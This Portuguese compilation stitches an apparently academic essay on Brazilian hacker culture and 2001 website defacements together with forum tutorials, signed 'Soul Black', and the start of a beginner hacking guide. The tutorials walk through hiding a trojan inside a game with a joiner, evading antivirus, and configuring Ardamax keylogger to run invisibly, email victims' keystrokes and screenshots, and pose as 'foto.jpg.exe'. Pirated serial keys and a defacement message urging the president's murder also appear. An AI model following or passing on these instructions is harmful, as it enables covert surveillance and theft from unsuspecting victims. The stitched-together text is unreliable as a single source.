“Eu sempre me esforcei para não causar nenhum tipo de dano e incômodo para o menor número de pessoas possível. Eu nunca, nunca, nunca deletei um arquivo de outra pessoa. Uma dos primeiros comandos que eu aciono num sistema novo é desativar o comando do arquivo delete.”[26]



Sobre a diferença em relação aos crackers, veja um pequeno trecho de uma conversa entre Emmanuel Goldstein, editor da revista “2600: The Hacker Quaterly”[27]:



“Mr. Markey... Vamos para o outro lado do problema: o brincalhão ou criminoso que está utilizando esta informação. Quais penalidades você sugeriria para lidar com os hackers do mal? Existem hackers do mal?

Mr. Goldstein – Existem poucos hackers do mal. Eu não conheço nenhum pessoalmente, mas estou certo de que eles existem.

Mr. Markey – Eu suponho que se você conhecesse algum, gostaria de ter certeza de que tomaríamos alguma providência sobre eles. Mas, vamos apenas supor que existem pessoas ruins neste meio. O que deveríamos fazer com eles?

Mr. Goldstein – Bem, Eu gostaria de esclarecer uma coisa: nós temos ouvido aqui em testemunho de que existem membros de gangues e de quadrilhas de drogas que estão utilizando esta tecnologia. Agora, vamos definir estas pessoas como hackers apenas porque eles se utilizam da tecnologia para atuar?

Mr. Markey – Sim. Mas, se você preferir dar a eles outro nome, por mim tudo bem. Nós podemos chamá-los de hackers e Crackers, ok?

Mr. Goldstein –Eu acho que nós deveríamos chamá-los de criminosos.

Mr. Markey – Hackers criminosos. O que fazemos com eles então?

Mr. Goldstein – As leis continuam existindo. Roubar ainda é roubar.[28] ”[1]



De acordo com Clough e Mungo[29], a ação de hackear, nos dias de hoje, significa acesso não-autorizado a computadores ou sistemas de computadores, assim como escrever bons e livres (abertos) programas de computador. Os primeiros hackers começaram a surgir no MIT na década de 60 fazendo softwares, depois, na década de 70, eles estavam modificando os hadwares, criando a micro-informática, e por fim, na década de 80 e 90, colonizando o ciberespaço com suas ações espetaculares.



Segundo Steven Levy[30], os hackers originais surgiram no setor de tecnologia do Instituto de Tecnologia de Massachusetts (MIT) e eram considerados a ‘nata da nata’ dos ativistas eletrônicos e pais da hoje mundialmente conhecida Internet. O grupo trabalhava criando programas para os novos sistemas de computadores. Os hábitos eram excêntricos: trabalhavam sempre à noite, às vezes por 36 horas seguidas, desaparecendo de casa por alguns dias. Depois os hackers inventam a micro-informática na Califórnia na década de 70 e colonizaram o ciberespaço nas décadas de 80 e 90.



Um dos objetivos mais nobre dos hackers, como foi dito anteriormente, é o de alertar a sociedade informatizada e dependente de toda parafernália informacional. Preocupados como a segurança desta sociedade cada vez mais controlada pelo poder tecnológico e informacional, eles têm buscado descobrir falhas em sistemas e, a partir daí, informar seus responsáveis dos riscos. Eles buscam também realizar protestos políticos contra governos e instituições, como veremos no caso brasileiro. Para o ex-hacker Derneval da Cunha[31]:



“A atividade do hacker é investigar onde se pode entrar, como entrar, como violar a segurança dos mecanismos de acesso às comunicações, às empresas e centros governamentais. Uma vez que se está ali é mais uma atividade de voyer, um jogo de xadrez contra a segurança do lugar onde se pretende violar. É entrar, ver e mais nada. O objetivo nunca é destruir.”

Para o engenheiro civil Marcelo Sampaio, pós-graduado em engenharia de segurança no trabalho e coordenador de Modernização da Secretaria de Segurança Pública do Estado da Bahia, há um erro conceitual quando se fala de hacker. “Na verdade, o hacker é um curioso, mas sem a intenção de fazer o mal. Só que a denominação hacker, associada à invasão de privacidade na informática, pegou. O Cracker, este sim, é perigoso, e, em muitos casos, ladrão.”[32]



O hacker carioca Fabiano Pereira, mais conhecido no underground digital como Alquimista, foi entrevistado pela equipe de pesquisa em maio de 2000. Em um trecho da entrevista, ele explicitou seu descontentamento com o tratamento que a imprensa brasileira vem dando aos hackers, taxando-os como criminosos ao invés de mostrar a importância que estes ativistas tiveram na história da micro-informática. Ele afirma:



“O hacker é uma pessoa que tem os meios, o conhecimento e a ousadia de invadir um site ou um sistema, mas que não causa grandes males ao sistema invadido. A diferença entre um hacker e um cracker são cruciais. Um cracker é uma pessoa que invade e "danifica" sistemas, que causa danos pelo simples prazer de fazê-lo. Um hacker, digamos, é um cracker "light". Ele somente mostra que esteve ali”.



Quem expressou melhor a importância dos hackers no desenvolvimento das novas tecnologias que dispomos hoje foi Manuel Castells[33]. Para ele o surgimento da rede mundial de computadores deveu-se ao que ele chama de convergência entre a ‘Big Science’, os militares e pelo underground digital, do qual os hackers fazem parte. Estes ativistas contribuíram de maneira decisiva na história da micro-informática e é por isso que, quando a imprensa minimiza o papel dos hackers na história, colocando-o no mesmo patamar dos crackers, ela reduz a importância que eles tiveram na consolidação da Internet e na relação que vemos entre homens e tecnologia na contemporaneidade.



Hackers no Brasil



O Brasil é um dos países campeões em sítios invadidos e desfigurados por hackers. Segundo o site alemão ALLDAS[34] (www.defaced.alldas.de), onde está disponível uma tabela com números atualizados de ataques a sítios de 154 países do mundo, o Brasil aparece em terceiro lugar com 1.453 sítios desfigurados por hackers, o que equivale a 8,05% do total. Os ataques são relativos ao período de 1999 até o mês de junho de 2001[35]. Com base nestes dados, podemos dizer que hoje o Brasil ocupa uma das primeiras posições na lista dos países onde o ativismo da cultura cyberpunk (hackerismo, hackerativismo), representada primeiramente na figura do hacker se faz presente e atuante.



Em 2001 foi grande a incidência de sítios invadidos, incluindo páginas dos gigantes do e-business, como Universo Online (UOL), Microsoft, Dell, Nasdaq, bem como de instituições governamentais como o Supremo Tribunal Federal (STF), o Departamento Nacional de Estradas e Rodagens (DNER), o Movimento dos Sem Terra (MST), e mesmo de personalidades da mídia como a Xuxa. Este fatos chamaram, evidentemente, a atenção da mídia, apontando a cultura hacker como um fato estrutural da cibercultura, também chamada de sociedade informacional ou era do informacionalismo, como propõe Castells[36]. A academia também se interessou, e se interessa a cada dia, pelas ações, ideologias e estilos da cultura hacker. Nos últimos anos pudemos constatar um crescimento de artigos, reportagens, matérias, tutoriais, filmes e entrevistas sobre o assunto[37].



Esta parte da pesquisa consistiu em monitorar a ação dos piratas digitais, os hackers, no Brasil. Para isto foi usado o sítio alemão Alldas (www.alldas.de) que é referência internacional no monitoramento da atividade desses cyberpunks. No sítio pode-se ter acesso a diversos tipos de dados e estáticas relacionados ao assunto[38]. É possível, por exemplo, conferir uma lista das páginas hackeadas por cada um dos grupos de hackers monitorados. Na maioria das vezes são os próprios hackers que enviam a informação de que desfiguraram (eles chamam de defaced pages) determinada página. Desta forma, o Alldas se transformou no mecânismo mais confiável para acompanhar a ação dos hackers. Isto se deu por conta do caráter de vitrine que o Alldas assumiu. Ele é assitido por todos os grupos, onde podem conferir o surgimento de novos grupos e o avanço na ação dos grupos antigos. O grau de dificuldade de entrar em determinado sítio confere maior status ao grupo responsável por aquela desfiguração dentro do panorama internacional.



Podemos agora fazer uma rápida tipologia das principais formas de discurso dos hackers brasileiros no período monitorado. Embora não tenha pretenção de esgotar o assunto, achamos que a análise do período expressa de forma fidedigna as principais formas de discurso dos hacker brasileiros hoje. Categorizamos as ações uma tipologia básica assim cnstituída: ações políticas, empresariais e de segurança e pessoais[39].



Ações Políticas



Entre as ações de cunho político, cuja escolha do sítio invadido está relacionada com a mensagem deixada, estão aquelas que buscam atacar políticos corruptos, instituições governamentais e denunciar a situação social e política brasileira. No universo da pesquisa podemos destacar a desfiguaração da página da UNIMED (www.unimed.com.br) realizada em 16/04/01 pelo grupo Killer Team, cuja mensagem deixada por eles foi: “$aude/ seus capitalistas sujos, como ousam dizer que querem a saude do ser humano se apenas pensam em extorquir dele capital?”[40] .



Outro exemplo interessante é a desfiguração do sítio do Wizard Curso de Idiomas pelo grupo Crime Organizado (Cr1m3 0rg4n1z4d0) no dia 20 do mesmo mês. A mensagem deixada trazia em destaque: “ingles e uma merdaaaaa !!! NAUM vaum pra escola e uma bosta vc naum aprende nada !!!!! essa desgra;ca de ingles !pra ke aprende essa merda ... pra servi os otros ... eles ke se phodão ! saum uns babacas kem gosta de ingles !!!!!!!!!!i todo mundo ke gosta de studar e porke e virgem e naum tem coisa melho r pra fazer seus burros desgraçados !!!!!!! se-outo-suicidem-se”



Há também as mensagens de cunho político genéricas, sem nenuma ligação com o assunto tratado no sítio invadido. É o caso, por exemplo, da ação contra o www.uema.br realizada também no dia 20/04/01 pelo mesmo grupo, Crime Organizado: “...The money is finishing with the land, men forget them its feelings and kill for greed! Think about...”



Outras mensagens genéricas atigem um grau de sofisticação quase artístico. O grupo Perfect.br deixou, no dia 19/05/01, no sítio www.escolajovem.es.gov.br, a inscrição: “RIOT: Just do it!”, abaixo da qual estava uma foto de um manifestante enfrentando sozinho vários soldados. Neste mesmo dia, o grupo dv98 deixo no sítio www.psfactoring.com.br uma imagem montada a partir de diversas figuras mostrando um corpo mutilado, com as vísceras expostas e uma vela. Ao lado, estava a inscrição: “The president of Brazil died in a trash after being spanked by the population rebelled for not being able to use its air-conditional ones.” A mesma página trazia ainda o texto: “Por causa de FHC e Malan, o Brasil vai voltar ao tempo das cavernas, usando vela e lampião. Espero que esse povo burro e imundo tenha aprendido a lição e nas proximas eleiçoes votem em ENEIAS que é nacionalista e não fala em vender o que é nosso./ MATEM O PRESIDENTE FHC E O MINISTRO MALAN! SÃO DOIS FILHOS DA PUTA!!”.



As mensagens deixadas nas páginas hackeadas perpassam, às vêzes, um ambiente de humor. Mesmo quando abordam assuntos sérios, os hackers o fazem de forma despojada. Para exemplificar, podemos citar o ataque realizado no dia 02/06/01, pelo grupo Azrael666 ao sítio da Telebip (um provedor de internet fluminense). A página trazia a inscrição: “Novo candidato a Presidencia deste pais chamado Brasil!!!!!!!!” acompanhada de uma foto de Marculino, o cangaceiro que foi apanhado por uma emboscada da polícia, e o slogan do candidato: “Em país de apagão, vote em LAMPIÃO”.



De forma geral os ataques hackers atualizam problemas políticos pelos quais passam o país, sendo uma forma de protesto contra o governo.



Ações Empresariais e de Segurança



Ações empresariais e de segurança são aquela nas quais os hackers desfiguram páginas para denunciar empresas ou a falta de segurança destas. Dentre essas ações podemos citar o ataque realizado no dia 02/06/01, pelo grupo Anti Security Hackers, ao sítio da Telemar do Maranhão, onde podia-se ler: “Anti Security Hackers - Telemar sux! Me mandaram 2 cobrancas e o telefone nao foi instalado Isso e um absurdo! - a 5a Telemar que nos ownamos – deveriam mudar o nome para TELEMERDA --- Queremos melhor prestacao de servico! Ta uma bosta! Telemaaaar chegou sua vez de falaaar! - Anti Security Hackers own TELEMAR”.



Há textos que combinam mais de um tipo de mensagem, tendo por elo de ligação chamar a atenção quanto à segurança da Internet. Podemos assim, destacar o ataque no dia 22/04/2001 do grupo Anti Security Hackers para o sítio www.ronam.com.br. Podia-se ler: “A Internet é totalmente insegura. Está na hora de reformular a Internet e aceitar que o conceito atual de segurança é bastante frágil. Provamos isso modificando esta página. Eles não podem deter todos nós, aprendemos cada vez mais dia a dia e ficamos mais fortes. Somos uma geração intencionada a mostrar a realidade que as grandes corporações escondem. Nós somos a CURA. Foda-se os governos dos EUA e do BRASIL. Foda-se o FBI, o DPF e Dr. Mauro Marcelo. Foda-se a Internet.”



No ataque realizado no dia 10/06/01 ao provedor de internet Softline (www.softline.com.br) pelo grupo LitleBoys, eles publicaram uma tabela com os logins (nome que identifica o usuário de um sistema) e respectivas senhas de TODOS os assinates. Com isto eles porvaram que poderiam ter feito ações como: conectar-se à Rede durante dias e fazer com que um dos assinantes pagasse a conta; ler a correspondência de qualquer assinante daquele provedor ou apagá-la antes que o destinatário tivesse lido; praticar qualquer tipo de ação na Rede – desde enviar correspondências até invadir um sítio – e atribuir a responsabilidade a um assinante daquele provedor. A partir do momento que esta informação foi publicada, dependendo do tempo que a empresa leve para mudar as senhas, qualquer pessoa que tenha visto a página pode também realizar uma das ações previstas acima. A desfiguração trazia a inscrição: “+ UM PROVEDOR PRA COLECAO DOS "LITLEBOYS" HAHAHAHAH”. O grupo reproduziu ainda parte de um texto do sítio original explicando o que “a melhor arma, como sempre, para combater estes fora-da-lei tecnológicos é a prevenção. Prevenção + Informação = Segurança.”.



Há também ações cometidas com vistas a desmoralizar o administrador do sítio: “Admin ---> não tenho o habito de alterar indexs mas o fiz apenas para alertá-lo do tamanho da brecha q tem o seu server!! ... atualize seu server ou ao menos configure-o!! e atenção: nada foi apagado, fique tranquilo, o "index.htm" original está salvo como "index_original.htm" ...”



A grande maioria dos ataques se restrigem a renomear os arquivos do sítio alvo. Ou seja, a mudança pode ser desfeita em alguns instantes, sem trabalho. Na verdade o que diferencia um ataque hacker de um ataque cracker é justamente o fato de que um hacker, que mereça esse nome, jamais destrói nenhuma informação dos sítios invadidos, eles ralizam as invasões seja para alertar contra a (não) segurança do provedor, seja para ganhar destaque no cenário, seja para publicar alguma mensagem ou realizar algum protesto, jamais apagam nenhum arquivo. No caos dos crackers, o objetivo é justamente o contrário.



Desta forma, é frequente que as páginas atacadas por determinado grupo numa senama sejam novamente atacadas pelo mesmo grupo ou por outro grupo na semana seguinte. O administrador do sítio atacado desfaz as mudanças realizadas pelos hackers, mas não descobre como eles conseguiram burlar a segurança. Talvez por conta deste procedimento é que o Brasil é o país do mundo onde o número de ataques mais cresce. Esta atitude equivale a de alguém que, após ter tido a casa invadida por estranhos, arruma todos os objetos que foram tirados do lugar, e não troca a fechadura. No dia 23/04/01, o grupo Azrael666 fez a pergunta aos sítio www.itaipu.com.br “Admin pq vc nao arruma o bug ao inves de restaurar a pagina novamente!!!! SeU InChAdO Do InFeRnO!!!!! 23/04/2001 12:00 hs.. Esqueci..BOM AlMoCo AdMin!!!!”



Ação pessoais



Ações pessoais compreendem mensagens de cunho subjetivo e religioso. Nesta vertente podemos dar destaque para o hacker auto denominado Genesy’ que emite mensagens religiosas. No dia 20/04/01 ele invadiu o sítio http://www.sesc.uol.com.br e deixaram este texto: “Quem dentre vos e sabio e entendido ? Mostre pelo seu bom procedimento as suas obras em mansidao de sabedoria . Mas , se tendes amargo ciume e sentimento faccioso em vosso coracao , nao vos glorieis , nem mintais contra a verdade . Essa nao e a sabedoria que vem do alto , mas e terrena , animal e diabolica. Porque onde ha ciume e sentimento faccioso, ai ha confusao e toda obra ma. Desculpas ao administrador deste site . Genesy´s”



Além das ações religiosas, podemos elencar nessa categoria as páginas com declaração de amor, mensagens pessoais, poesias, excertos de livros e outras temáticas pessoais. A página do Wizard foi invadida do dia 22/04/01 pelo grupo NeOtz, onde foi deixado um recado para uma menina “...déia, vc eh linda .... beijocas !!!!!!!! acho q estou me apaixonando por vc.......... ;)”. Neste caso, o objetivo seria mais anárquico do que político. Invade-se sitios para afirmar uma posição pessoal de conquistas, deixando mensagens de cunho pessoal.





Conclusão



É difícil identificar um padrão nas atividades dos hackers brasileiros. Por detrás de cada uma das séries de letras embaralhadas e confusas que denominam os grupos de hackers, estão posturas completamente distintas. Entre algumas das mensagens mais comuns que podemos encontrar nas páginas desfiguradas estão: críticas ao governo brasileiro, ao FMI, a política imperialista dos EUA, ao capitalismo. Também é possível encontrar críticas à Microsoft, ao Windows NT – que muitas vezes é responsabilizado por tornar tão fácil os ataques hackers – e chingamentos a Bill Gates. Mas há também mensagens de amor para a namorada do hacker, SCII art, piadas, entre outras formas de protesto e/ou expressão artística e/ou religiosa.



Algumas páginas trazem apenas um desenho e nenhum texto. Nestes casos são comuns os mangás japoneses, os logos dos grupos resposáveis, e figuras que representam o imaginário cyberpunk -- a exemplo de cyborgues e das cenas pós-apocalípticas – que podem tanto ser copiadas de produtos culturais relativos a esta temática (H.Q.s, filmes), quanto terem sido criadas pelo hacker responsável pelo desfiguramento. Há algumas páginas que trazem músicas, sendo tocada em streaming.



Este trabalho teve como objetivo revisar a literatura sobre os cyberpunks reais e mostrar algumas particularidades da cultura hacker no Brasil. Este texto foi realizado como resultado de 16 semanas de monitoramento pelo Alldas (entre os dias 15/04/01 até 04/08/010. Durante este período, o Alldas registrou a invasão de 697 sítios de domínio .br, dos quais foram analizados 150. Deste total, 39 (26%) apresentavam mensagens de cunho político, 27 (18%) eram mensagens pessoais ou publicidade do grupo responsável pela desfiguração, 16 (11%) era advertências sobre a ausência de sistemas de segurança eficazes na Internet, e 05 (3%) eram mensagens reliosas.



Foram encontrados também 04 (2,7%) onde só havia uma figura feita em SCII Art, 04 (2,7%) possuiam apenas uma frase com uma “reflexão” e 02 (1,3%) tinham piadas. As demais 52 (35%) eram páginas cinza com apenas o nome do grupo, ou mensagens que não se encaixariam em nenhuma destas classificações.



Podemos ver claramente que, no período analisado, as ações dos hackers brasileiros concentraram-se mais em mensagens de cunho politico ou de ataque a empresas e a segurança da rede. Podemos assim comparar a ação dos hackers brasileiros com a literatura mundial e mostrar que a cultura hacker no Brasil está dentro do espírito cyberpunk, caracterizando como uma tribo ativista e ao mesmo tempo anárquica, hesitando entre a política séria, a mensagem de cunho pessoal e o deboche grafiteiro.



Há também mensagens pessoais sem nenhuma intenção social .Encontramos aqui a tese de Pekka Himanen, segunda a qual a ética hacker é o espírito da era da informação assim como o protestantismo representou o espírito da era do capitalismo industrial. Ele opõe assim a ação dos hackers à aquelas descritas por Max Weber como o espírito do capitalismo. Podemos dizer então, que o Brasil está criando uma cultura hacker na rede, mas não desenvolve ações coordeandas como ONG’s, Fundações, como acontece com os EUA (EFF, CDT…), a Holanda (Hactic), a Alemanha (CCC) e outros países europeus. Embora apareça com mais destaque as ações de cunho político ou contra a falta de segurança na rede, a cultura cyberpunk brasileira, simbolizada aqui pelos hackers, é também descompromissada com a política clássica, oscilando entre o engajamento político e o mero divertimento. Como afirma Linus Torvalds, hacker criador do Linux, “para um hacker, o computador por si só já é diversão

Depois de ler o tuto do ardamax leia issu ensinarei a camufla-lo

.:: Camuflando arquivos ::..

Aqui você irá aprender a como camuflar dois arquivos em um só executável.. Hoje na internet existem milhares de joiners ( programa usado para camuflar arquivos ).

Então justamente com um joiner você poderá camuflar arquivos. Usaremos o Senna Spy One EXE Maker 2001b.

Ele simplesmente consegue juntar 2 ou mais arquivos executáveis, sendo que você controla qual o arquivo será aberto e visto pela vítima e qual será executado sem a vítima perceber. É um programa bem simples e fácil de usar, não tem segredo. Agora citarei as funções do Senna Spy One EXE Maker 2001b : Troca de ícones : você poderá escolher o ícone do arquivo criado. Registro do start : seu arquivo criado será automaticamente executado quando a máquina iniciar. Registro de OCX : automático registro de OCX. Como usa o joiner , veja passo a passo de como criar um arquivo camuflado. 1º Clique em 'Add File' e selecione o arquivo que abrirá automaticamente, independentemente dele ser jogo ou programa qualquer. Ex : Pinball.exe. 2º O arquivo Pinball.exe foi incorporado no programa. Agora veremos o modo de execução dele nas opções : Open Mode : Selecione a opção normal. Copy To : Onde será criada uma cópia do programa. Escolha uma pasta qualquer. Action : Selecione a opção Open / Execute. Registry Start : selecione 'no'. 3º Pronto, agora camuflaremos o trojan junto com o seu jogo. Clique em 'Add File' e selecione o arquivo que infectará a vítima. No caso, usaremos o 'Server.exe' 4º O arquivo 'Server.exe' foi incorporado no programa. Vejamos o seu modo de execução : Open Mode : Selecione a opção Hide. Copy To : Onde será criada uma cópia do programa. Escolha uma pasta qualquer. Action : Selecione a opção Open / Execute. Regeistry Start : Selecione Yes. Com isso, o arquivo será executado toda vez que a máquina iniciar. 5º Se preferir mude o ícone. Veja na opção Main Ico, clique no botão Charge, e escolha o ícone, o arquivo .ico. 6º Seu arquivo camuflado está pronto! Clique no botão 'Save', e escolha a pasta onde o arquivo será salvo, e o nome dele no caso, poderá ser de 'jogodepinball'. Pronto, quando a vítima executar o arquiovo jogodepinball.exe, será executado ocultamente o trojan ' server.exe ', e o jogo ' pinball.exe ' abrirá normalmente. Agora mande para seus amigos. Não tem como descobrir que nesse arquivo tem um trojan camuflado, a não ser que a vítima tenha um anti - vírus instalado e ele detecta um trojan no arquivo. Nesse caso, use um trojan mais recente possível, de modo o anti - vírus não o detecte.
outro jeito de se camuflar e a 1º forma q ja expliquei no tuto do ardamax usando o proprio keylogger em remote instalation prefiro sempre fazer no remote mas quem preferir no one exe fika a criterio
bom proveito
By : Soul Black

Bom aki vou tentar fazer um tutorial sobre = ARDAMAX KEYLOGGER

ARDAMAX KEYLOGGER

Registrando:

De um clique com o botao direito e vá em ENTER REGISTRARION KEY, e bote a serial:

user posted image

CODE
Name: Nemesis
Serial: YKPJVSDPITIUTRL

Name: www.serials.ws
Serial: TVOGVGCPMUFCORA

Name : h4xbr
Serial: PEEIUROHJBTBEHF


user posted image

Ok, kl registrado, agora vamos a configuração.

Configurando:

Click com o botao direito no icone e vamos em OPTIONS, mas se kiser nao receber os logs do seu pc, va para REMOTE ISTALATION. Tem gente ke começa fazendo o tuto de lah, mas muitos tbm procuram keylogger pra poder ver oke estao aprontando no seu pc, e otros pra hackearem...

Vamos para a janela INVISIBILITY

Aqui deixe marcado TODAS as opçoes, pois aqui eh muito importante é como o seu keylogger ficara escondido no pc.

HIDE TRAY ICONE = aquii serve pra esconder o icone do relogio... .
HIDE THE PROGRAM FROM CRTL+ALT+DEL = esconder do ctrl + alt + del...
REMOVE SHORTCURTS FROM START MENU = aquii é para não deixar nada no iniciar da vitima...
REMOVE DE PROGRAM FROM UISNTALTION LIST = aquii é para tirar a opção de desinstalar o Ardamax pelo *ADICIONAR/REMOVER PROGRAMAS*...
HIDE PROGRAM FOLDER = Esconde a pasta do ardamax lá na pasta do windows ou system..
HIDE THE PROGRAM... = e aquii é para esconder o Ardamax da lista de programas que iniciam com o windows... tem gente que nao marca porque diz que se o cara desliga no dedão, o keylogger não inicia junto na próxima vez..

user posted image

Agora vamo para a janela SECURITY

Click em ENABLE, e bote uma senha, importante nao desmarcar nenhuma opçao

Vamos traduzir:

CODE
Protect Hidden Mode = Protege quando a pessoa Entra/Sai do modo de invisibilidade.

Protect Log File = Protege que alguem veja o registro dos logs do Ardamax.

Protect program options = Protege que alguém veja ou troque as suas configuraçoes.

Lock program closing = Protege que alguém fexe o programa.


Tudo isso vai tar protegido pela senha que você inseriu, por isso nao esqueça dela.

user posted image

Em WEB UPDATE, desmarque a opçao CHECK FOR UPDATES, nao vamos dar nenhum vestijo pra vitima né?

user posted image

Agora em OPTIONS, clique em START IN HIDDEN MODE, para iniciar o programa em modo invisivel, e a opçao de cima é para iniciar junto com o windows, bote tudo marcado! Agora em HIDDEN MODE ON, na mesma janela, você pode escolher uma sequencia de teclas para entrar/sair do modo de invisibilidade, o padrao eh CTRL + SHIFT + ALT + H , se quiser pode trocar, e em baixo tem a opçao de SELF DESTRUCT ON, pouco usado, serve pra destruir o keylogger num exato dia que vc desejar.

user posted image

Agora vamos para a aba DELIVERY

Vamos primeiro em EMAIL.

Coloque seu email em sent to, send from, escreve qualquer merda ae ou entao pode deixar em branco, depois que colocar o email, click em find para ke em poucos segundos ele axe o host, bote seu nick e senha em USERNAME e PASSWORD

user posted image

Agora vamos para a janela CONTROL

Clique em SEND LOGS EVERY, e aqui você vai configurar como os logs chegaram, DEVIVERY METHOD, deixe em email, pois estamos configurando para email. INCLUDE, deixa como esta, LOG FORMAT, aqui você escolhe se quer ler os logs em HTML ( no email ) ou ENCRYPTED ( sendo visto pelo keylogger ), mas deixe em HTML, SEND ONLY IF LOG SIZE EXCEEDS, aqui você escolhe o tamanho que queira que o keylogger envie os logs depois que eceder o tamanho indicado.

user posted image

Em MONITORING, va em SCREENSHOTS, e configure como quer que os logs de imagens vão chegar, CAPTURE SCREENSHOT EVERY, o tempo em que ele ira capturar as imagens, em TARGET, você escolher se quer ver FULL SCREEN ( tela inteira ) e ACTIVE WINDOW ( a tela que esta sendo usada no momento )

user posted image

Pronto! Keylogger configurado!

Agora vou ensinar, como fazer um server e enviar o kl para a vitima. Click com o botao direito no icone e vamos em REMOTE ISTALLATION

Criando um server:

user posted image

user posted image

Avanças...

Em APPEARANCE, clique em Append keylogger engine to file or another applicarion, escolha um arkivo em que vamos juntar com o keylogger, aqui vamos pegar uma foto

user posted image

Agora va avançando e vera as configuraços ke vc fez. Avanças ate DESTINATION

Em Keylogger engine path, sera o caminho ke sera criado o server, escreva um nome no final para o server, vamos deixar assim foto.jpg.exe

Em CHARGE ICON, troque o icone para um que você ache melhor de enganar a vitima. Avançar e concluir

user posted image

user posted image

Mas uma vez digo, se vc nao kiser receber os logs do seu pc, ou se esta recebendo, nao se preocupe, apenas faça uke esta no tutorial, mas nao nas opçoes, mas sim na REMOTE ISTALATION.

Removendo kl:

Se enfectou com um server? Baixe o removedor, oferecido pela propria Ardamax

OBS: Remove apenas o server

Enviando por MSN:

É bem simples, apenas compacte o server com algum programa do tipo, feito o WinRAR e manda po cara.
By: Soul Black

GUIA DE (na maioria) HACKING INOFENSIVO

Iniciantes- Parte #1

Então queres se tornar um hacker inofensivo ?

________________________________________________________________

"Quer dizer que alguém pode hackear sem quebrar a lei?"

Essa era a voz de um calouro estudante de segundo grau.
Ele me tinha no telefone porque o pai tinha acabado de levar o computador dele.
A ofensa do menino ? Ter quebrado dentro da minha conta com meu provedor.
O guri esperava me impressionar com esperteza dele.
Mas antes de eu descobrir que ele tinha entrado na minha conta, um administrador
do sistema do meu provedor, já tinha descoberto as explorações inofensivas e
alertou os pais do guri.Agora esse menino estava pedindo minha ajuda para que
ele pudesse novamente voltar on-line.

Eu disse para o guri que eu até dava razão ao pai dele. Pois imagine se o
administrador do sistema e eu fossemos mais reticentes? Esse menino poderia
parar preso no juízado de menores.
Mas o caso é que eu não concordo em botar hackers inofensivos na cadeia,
e eu nunca teria testemunhado contra ele. Mas para algumas pessoas, cadeia é o
destino daqueles que vão espiar em contas de outras pessoas em computadores,
mesmo que o tal seja totalmente inofensivo.
Esse guri prescisa aprender em como se manter fora de confusão!

Hacking é o jogo mais exilariante no planeta, mas ao mesmo tempo deixa de ser
legal se fores parar em uma cadeia, com um companheiro de cela chamado "espeto".
Mas hacking não prescisa significar quebrar as leis. Nesse livro, nós ensinamos
hacking com segurança, para que você não precise ficar desconfiado de que espiões
e policiais estão te vigiando pelas suas costas.

O que nós queremos dizer é hacking como uma recreação saúdavel, como também em
forma de uma educação que até poderia te qualificar a obter um emprego de alto
salário.Na verdade, muitos administradores de rede, cientistas de computação e
especialistas em segurança de computadores, primeiramente aprenderam suas
respectivas profissões, não em currículo de alguma universidade, mas da cultura hacker.
E você pode até ficar surpreso, mas na verdade a própria Internet,é protegida não
por agências de inteligência de qualquer governo ou multinacionais, mas por uma
sociedade mundial de, sim, hackers.

Você também, pode se tornar um de nós.

E também -- hacking pode ser surprendentemente fácil. Se eu posso fazer isso,
qualquer um pode!

Independente do por que você quer se tornar um hacker, definitivamente é um meio
de muita diversão, impressione seus amigos, até arrume encontros.
Se você é uma hacker, você se torna totalmente irresistível para os homens.
Te garanto! ;^D

Esses Guias de (na maioria) Hacking Inofensivo, podem ser o seu portão de entrada
para esse mundo. Pois depois de leres só alguns desses Guias você será capaz de já
fazer altos lances que serão ainda dentro da lei mas também já irá impressionar
totalmente os seus amigos.

Esses Guias também podem te preparar para se tornares um desses vigilantes,
que evitam da Internet ser destruída pelas pessoas ruins, especialmente os otários
os "punheteiros". he,he,he.
Você pode também aprender em como evitar que os mesmos mexam com sua conta no seu
provedor, tipo seu e-mail, a configuração do seu micro, suas files, inclusive os
trotes que mantém geralmente o usuário normal da Internet intimidado e assustado.

Se você andar com a gente um ano inteiro ou coisa assim, você poderá aprender
o suficiente e até encontrar as pessoas no nosso e-mail list e canal de IRC os quais
podem te ajudar a se tornares verdadeiramente parte da elite.

Embora, antes de mergulhares dentro da sub-cultura hacker, esteja preparado para
encarar o jeito de ser dos hackers. Você acaba de ser avisado!

Então.....Seja benvindo à aventura que é hacking!

O QUE EU PRESCISO PARA PODER HACKEAR?

Se você pensa que hackers precisam de custoso equipamento de computação ou
uma biblioteca de manuais técnicos ou coisa similar. A resposta é NÃO. Hacking pode
ser bem simples!
Melhor ainda, se você sabe como procurar informações na WEB, você
praticamnete pode achar qualquer informação sobre computadores de graça.

De fato, hacking é tão fácil que se você tem conta com um provedor,
e sabe como mandar e ler e-mail, você pode começar a hackear de imediato.
O GDMHI Iniciantes Parte #2 te ensina onde podes download programas especiais para hackers en
Windows que são absolutamente grátis.
E nós iremos te mostrar alguns simples truques a que você poderá usá-los.

Agora, suponha que você queira se tornar um hacker de elite? Tudo realmente que
precisará é uma não cara "shell account", com um provedor de Internet.
No GDMHI Iniciantes- Parte #3, iremos te mostrar como conseguir um acesso à uma
shell account, e começar a jogar o melhor jogo do planeta: Hacking em Unix!
E nos Volumes: I, II e III do GDMHI, você poderá já a entrar seriamente em
hackear em Unix.

Você até poderá fazer parte das fileiras dos chamados: Uberhackers, sem
precisar gastar muita grana em caro equipamento de computação. No Volume II
nós te introduzimos ao Linux, o sistema de operação gratuito e de prefêrencia
dos hackers, Linux roda até em um micro 386 com somente 2MB de RAM! Linux é tão bom,
que muitos provedores já o tem rodando e controlando seus sites.

No Volume III nós também introduziremos Perl, a linguagem de programção para shells
adorada pelos Uberhackers. Nós até te ensinaremos algumas funções letais ou "exploits",
que rodam em Perl usando Linux. OK, você pode usar esses "exploits" para ações ilegais.
Mas eles só se tornam ilegais se usados contra o computador de alguém sem a permissão
do dono ou responsável.
Você pode rodar qualquer programa nesse livro no seu próprio computador, ou no do seu
(com consentimento)amigo. Seriamente falando, nada nesse livro irá na verdade danificar
o seu computador, a não ser que usado com o intento do dano de propósito.

Também abriremos os portões para um maravilhoso sub-mundo, onde poderás ficar informado
de todas as descobertas de falhas em segurança de sistemas. Onde poderás delas tirar
proveito, ou defender seu sistema contra as mesmas.

Sobre o Guia de (na maioria) Hacking Inofensivo

Nós temos notado que existem muitos livros que glorificam hackers.
Ao ler esses livros talvez você pense que se levaria muitos anos de um brilhante
trabalho para se tornar um deles. Claro que nós hackers amamos perpetuar esse mito,
porque ele nos faz parecer incrívelmente invejado.

Mas, quantos livros podes encontrar, que digam ao iniciante passo a passo,
como realmente fazer essa coisa chamada hacking? Nenhum ! Sério, você já leu um livro tipo:
"Segredos de um Super-Hacker" ou "Segredos Proibidos da Sociedade Hacker Fim-do-Mundo" ?
